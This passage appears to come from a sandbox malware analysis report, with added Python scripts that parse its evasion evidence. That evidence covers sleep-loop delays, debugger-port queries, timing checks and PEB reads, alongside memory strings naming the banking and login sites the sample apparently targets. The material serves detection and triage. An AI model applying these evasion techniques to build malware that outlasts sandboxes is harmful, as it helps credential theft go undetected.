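LOOP_CALLS = 30

# Copied from the report's "Malware Analysis System Evasion" section (constructed
# sample input for this example; the trailing "Jump to behavior" is page residue).
SAMPLE_REPORT_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 3802 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 5990 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep count: 3819 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep count: 4590 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -19369081277395017s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep count: 1048 > 30Jump to behavior
Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep time: -2096000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep count: 8925 > 30Jump to behavior
Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep time: -17850000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5816Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe TID: 7728Thread sleep time: -40000s >= -30000sJump to behavior
"""


@dataclass(frozen=True)
class SleepEvent:
    image: str   # executable name with the directory stripped
    tid: int
    kind: str    # "time" (milliseconds) or "count" (number of sleep calls)
    value: int


# The report glues the TID to the word "Thread", so allow zero whitespace there.
_TIME_RE = re.compile(
    r"Source: (?P<image>.+?) TID: (?P<tid>\d+)\s*Thread sleep time: -(?P<val>\d+)s >= -\d+s")
_COUNT_RE = re.compile(
    r"Source: (?P<image>.+?) TID: (?P<tid>\d+)\s*Thread sleep count: (?P<val>\d+) > \d+")


def parse_sleep_events(report_text: str) -> list[SleepEvent]:
    """Extract every 'Thread sleep time/count' observation; other lines are ignored."""
    events = []
    for raw in report_text.splitlines():
        line = raw.strip().removesuffix("Jump to behavior").rstrip()
        for kind, rx in (("time", _TIME_RE), ("count", _COUNT_RE)):
            m = rx.search(line)
            if m:
                image = m["image"].rsplit("\\", 1)[-1]
                events.append(SleepEvent(image, int(m["tid"]), kind, int(m["val"])))
                break
    return events


def infinite_waits(total_ms: int) -> int:
    """Number of infinite-timeout waits a summed delay represents (0 for a real delay)."""
    if total_ms >= INFINITE_MS and total_ms % INFINITE_MS == 0:
        return total_ms // INFINITE_MS
    return 0


def summarize(events: list[SleepEvent]) -> dict:
    """Per (image, tid): summed delay, summed call count, and which evasion signal it matches."""
    per_thread = defaultdict(lambda: {"sleep_ms": 0, "calls": 0})
    for ev in events:
        per_thread[(ev.image, ev.tid)]["sleep_ms" if ev.kind == "time" else "calls"] += ev.value

    result = {}
    for key, agg in per_thread.items():
        inf = infinite_waits(agg["sleep_ms"])
        flags = []
        if inf:
            # Blocking forever on an event, not a timed delay; weak evidence on its own.
            flags.append(f"infinite-timeout wait x{inf}")
        elif agg["sleep_ms"] >= LONG_SLEEP_MS:
            flags.append("long total delay")
        if agg["calls"] > LOOP_CALLS:
            flags.append("sleep loop")
        avg_ms = None
        if agg["calls"] and agg["sleep_ms"] and not inf:
            avg_ms = agg["sleep_ms"] / agg["calls"]
            if avg_ms < LONG_SLEEP_MS:
                # Many sub-threshold sleeps adding up to a long delay: the classic
                # way to outlast a sandbox that only skips single long sleeps.
                flags.append("delay split into short sleeps")
        result[key] = {**agg, "infinite_waits": inf, "avg_ms": avg_ms, "flags": flags}
    return result


if __name__ == "__main__":
    for (image, tid), info in sorted(summarize(parse_sleep_events(SAMPLE_REPORT_LINES)).items()):
        print(f"{image}:{tid}  sleep_ms={info['sleep_ms']}  calls={info['calls']}  "
              f"avg_ms={info['avg_ms']}  {', '.join(info['flags']) or '-'}")
```

Run on the lines above, the script separates the powershell.exe threads (infinite-timeout waits, which a PowerShell host also performs while blocking on runspace events, so they deserve little weight) from iexpress.exe TID 5812, where 9 973 calls sum to 19 946 000 ms, i.e. a steady 2 000 ms per call: a delay loop built from individually harmless sleeps, which is the entry a responder should read as deliberate.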
Source: 5z722a.12.dr | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: discord.comVMware20,11696494690f
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ive Brokers - GDCDYNVMware20,11696494690p
Source: 5z722a.12.dr | Binary or memory string: AMC password management pageVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: svchost.exe, 0000000D.00000002.2230591207.0000017B01A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: 5z722a.12.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 5z722a.12.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 5z722a.12.dr | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 0000000D.00000002.2235238818.0000017B07058000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,116
Source: 5z722a.12.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: powershell.exe, 00000007.00000002.1185379054.000002357C790000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW1.%SystemRoot%\system32\mswsock.dlltem32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cats|5
Source: 5z722a.12.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 5z722a.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690 (2 occurrences)
Source: 5z722a.12.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: powershell.exe, 00000008.00000002.1108214345.0000015DA88A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.1567529480.000001851E9DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 5z722a.12.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 5z722a.12.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,1169649469?
Source: iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj'MY
Source: 5z722a.12.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696-
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ca.comVMware20,11696494690x
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s.office.comVMware20,11696494690o
Source: DmMVOWsP1JSI77P.exe, 00000014.00000002.2229057165.00000000012A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: 5z722a.12.dr | Binary or memory string: global block list test formVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: powershell.exe, 00000008.00000002.1078118141.0000015D902A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
Source: 5z722a.12.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 5z722a.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n PasswordVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 5z722a.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 5z722a.12.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 5z722a.12.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\iexpress.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01ABD1C0 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00417BF3 LdrLoadDll
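The observations above (sleep loops and delay values, DebugPort queries, rdtsc) and the fs:[00000030h] reads listed below are raw material that an analyst turns into indicators. The following Python script is an added example, not Joe Sandbox code and not part of this report: it parses observation lines in the layout used on this page (both the raw fused form with its "Jump to behavior" link text and the cleaned "Source: ... | ..." form with "(N occurrences)" suffixes), aggregates sleep calls per thread, recognises the PowerShell delay value 922337203685477 as .NET TimeSpan.MaxValue expressed in milliseconds, and ranks functions by how often they dereference the PEB pointer at fs:[30h]. The sample lines are copied from this section; the regular expressions, field names and the reading of the function-id layout are the example's own assumptions about the report format.

```python
"""Turn the anti-analysis observation lines of a Joe Sandbox report (the layout used
in this section) into structured indicators. Added example, not Joe Sandbox code; it
accepts both the raw fused lines and the cleaned 'Source: ... | ...' layout."""
import re
from collections import Counter, defaultdict

# .NET TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10_000 ticks per ms.
# A "delay time" equal to this is a wait with an effectively infinite timeout.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

_SEP = r"\s*\|?\s*"  # column separator: optional, so raw and cleaned lines both parse
_ID = r"\d+_\d+_[0-9A-Fa-f]+"  # function id as printed on this page: <process>_<n>_<hex address> (assumed layout)
PATTERNS = (
    ("sleep_count", re.compile(r"Source: (?P<src>.+?) TID: (?P<tid>\d+)" + _SEP +
                               r"Thread sleep count: (?P<n>\d+) > (?P<thr>\d+)")),
    ("sleep_time", re.compile(r"Source: (?P<src>.+?) TID: (?P<tid>\d+)" + _SEP +
                              r"Thread sleep time: (?P<t>-?\d+)s >= (?P<thr>-?\d+)s")),
    ("delay", re.compile(r"Source: (?P<src>.+?)" + _SEP + r"Thread delayed: delay time: (?P<ms>\d+)")),
    ("proc_query", re.compile(r"Source: (?P<src>.+?)" + _SEP + r"Process (?:information )?queried: (?P<info>\w+)")),
    ("code_fn", re.compile(r"Source: (?P<src>.+?)" + _SEP + r"Code function: (?P<fn>" + _ID +
                           r") (?P<insn>.+?)(?:\s?" + _ID + r")?$")),
)


def parse(text):
    """Yield (kind, fields, occurrences) for each recognised line; unknown lines are skipped."""
    for raw in text.splitlines():
        line = re.sub(r"Jump to behavior$", "", raw.strip()).strip()  # drop link residue
        occ = 1
        m = re.search(r" \((\d+) occurrences\)$", line)  # collapsed duplicate lines
        if m:
            occ, line = int(m.group(1)), line[:m.start()]
        for kind, rx in PATTERNS:
            m = rx.match(line)
            if m:
                yield kind, m.groupdict(), occ
                break


def sleep_evasion(text):
    """Per (source, tid): sleep-call count, summed delay and delay per call in the units
    the report prints (no conversion), plus whether the report's own thresholds were crossed."""
    stats = defaultdict(lambda: {"count": 0, "count_thr": None, "total": 0, "total_thr": None})
    for kind, f, _ in parse(text):
        if kind == "sleep_count":
            s = stats[(f["src"], int(f["tid"]))]
            s["count"], s["count_thr"] = int(f["n"]), int(f["thr"])
        elif kind == "sleep_time":
            s = stats[(f["src"], int(f["tid"]))]
            s["total"], s["total_thr"] = abs(int(f["t"])), abs(int(f["thr"]))
    for s in stats.values():
        s["per_call"] = s["total"] / s["count"] if s["count"] else None
        s["flagged"] = ((s["count_thr"] is not None and s["count"] > s["count_thr"]) or
                        (s["total_thr"] is not None and s["total"] >= s["total_thr"]))
    return dict(stats)


def infinite_waits(text):
    """Sources whose 'Thread delayed' value is TimeSpan.MaxValue in ms (an open-ended wait)."""
    return sorted({f["src"] for k, f, _ in parse(text)
                   if k == "delay" and int(f["ms"]) == TIMESPAN_MAX_MS})


def debugger_checks(text):
    """Direct anti-debug indicators: ProcessDebugPort queries, rdtsc timing, and reads of
    fs:[30h], the TEB slot holding the PEB pointer on 32-bit Windows; BeingDebugged,
    NtGlobalFlag and the loader module lists are all reached from that pointer."""
    out = {"debug_port": set(), "rdtsc": set(), "peb_reads": Counter()}
    for kind, f, occ in parse(text):
        if kind == "proc_query" and f["info"] == "DebugPort":
            out["debug_port"].add(f["src"])
        elif kind == "code_fn":
            if f["insn"].startswith("rdtsc"):
                out["rdtsc"].add(f["fn"])
            m = re.match(r"mov (\w+), dword ptr fs:\[00000030h\]", f["insn"])
            if m:
                out["peb_reads"][(f["fn"], m.group(1))] += occ
    return out


def hottest_peb_readers(text, n=3):
    """Functions with the most PEB dereferences: a one-off BeingDebugged check reads the
    PEB once, a hand-rolled import resolver walking PEB->Ldr reads it over and over."""
    by_fn = Counter()
    for (fn, _reg), c in debugger_checks(text)["peb_reads"].items():
        by_fn[fn] += c
    return by_fn.most_common(n)


# Constructed sample: lines copied from this section of the report (one left in the raw
# fused form with its "Jump to behavior" link residue to show that it parses as well).
SAMPLE = r"""
Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812 | Thread sleep count: 8925 > 30
Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812 | Thread sleep time: -17850000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5816Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01ABD1C0 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A651EF mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A7D1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A7D1D0 mov ecx, dword ptr fs:[00000030h]
"""

if __name__ == "__main__":
    for key, s in sleep_evasion(SAMPLE).items():
        print(key, s)
    print("infinite waits:", infinite_waits(SAMPLE))
    print("debugger checks:", debugger_checks(SAMPLE))
    print("hottest PEB readers:", hottest_peb_readers(SAMPLE))
```

Run it directly for a printed summary. The per-call figure uses whatever unit the report prints (the "s" suffix is taken verbatim and not converted): the 8925 sleeps of iexpress.exe work out to 2000 units each, a fixed short sleep in a loop, which is the pattern sandboxes counter by skipping or shortening sleeps. The PEB-read ranking is the more useful output for triage: `mov eax, dword ptr fs:[30h]` is how any 32-bit code reaches the PEB, so the count per function separates a single debugger check from a resolver that walks the loader lists repeatedly, and the top entry is the first function to open in the memory dump.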
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AF11A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A5B1B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AFC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A80185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AC019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A97190 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A651EF mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A451ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B161E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A701F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B061C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A7D1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A7D1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B151CB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01ABE1D0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01ABE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A70124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A41131 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3B136 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B00115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AEA118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AEA118 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3F172 mov eax, dword ptr fs:[00000030h] (21 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AD9179 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B15152 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AD4144 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AD4144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A39148 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A46154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A47152 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B060B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B060B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A4208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3D08D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A45096 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A6D090 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A7909C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A650E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A650E4 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A480E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A820F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A570C0 mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A570C0 mov ecx, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B150D9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01ABD0C0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AC20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A690DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B0903E mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A5E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B15060 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A51070 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A51070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A6C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01ABD070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AE705E mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AE705E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A42050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A6B052 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A633A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A733A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A6438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A3E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01B1539D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A9739A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A38397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01AFF3E6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]10_2_01A503E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]10_2_01A503E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]10_2_01A503E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]10_2_01A503E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]10_2_01A503E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A503E9 mov eax, dword ptr fs:[00000030h]10_2_01A503E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B153FC mov eax, dword ptr fs:[00000030h]10_2_01B153FC
